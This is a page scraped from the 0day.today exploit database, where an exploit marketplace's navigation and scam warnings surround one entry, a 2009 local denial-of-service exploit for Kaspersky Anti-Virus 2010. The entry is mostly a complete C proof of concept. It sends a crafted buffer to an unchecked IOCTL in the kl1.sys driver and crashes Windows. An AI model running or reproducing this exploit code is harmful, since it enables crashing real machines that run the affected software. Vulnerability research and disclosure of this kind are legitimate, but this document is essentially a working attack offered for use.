0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kaspersky AV 2010 9.0.0.463 Local DoS
===================================== Kaspersky AV 2010 9.0.0.463 Local DoS ===================================== # Title: Kaspersky AV 2010 9.0.0.463 Local DoS # CVE-ID: () # OSVDB-ID: () # Author: Heurs # Published: 2009-09-29 # Verified: yes view source print? #include <stdio.h> #include <windows.h> #include <winioctl.h> #include <stdlib.h> #include <string.h> /* Program : Kaspersky Anti-Virus 2010 9.0.0.463 Homepage : http://www.kaspersky.com Discovery : 2009/09/29 Author Contacted : 2009/10/01 Found by : Heurs This Advisory : Heurs //----- Application description The most trusted virus and spyware protection - premium protection against viruses, spyware, Trojans, worms, bots and more. Also includes comprehensive phishing and identity theft defense and superfast performance. //----- Description of vulnerability kl1.sys driver don't check inputs address of an IOCTL. An exception can be thrown if we modify one or two DWORDs. With my test I can't do best exploitation than a BSOD. //----- Credits http://www.sysdream.com http://ghostsinthestack.org s.leberre at sysdream dot com heurs at ghostsinthestack dot org //----- Greetings Trance */ int __cdecl main(int argc, char* argv[]) { HANDLE hDevice = (HANDLE) 0xffffffff; DWORD NombreByte; DWORD Crashing[] = { 0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 0xb5ebadc5 }; BYTE Out[0x20]; printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL); printf("Sploit Send.\nhDevice = %x\n", hDevice); CloseHandle(hDevice); getch(); return 0; } # 0day.today [2024-12-24] #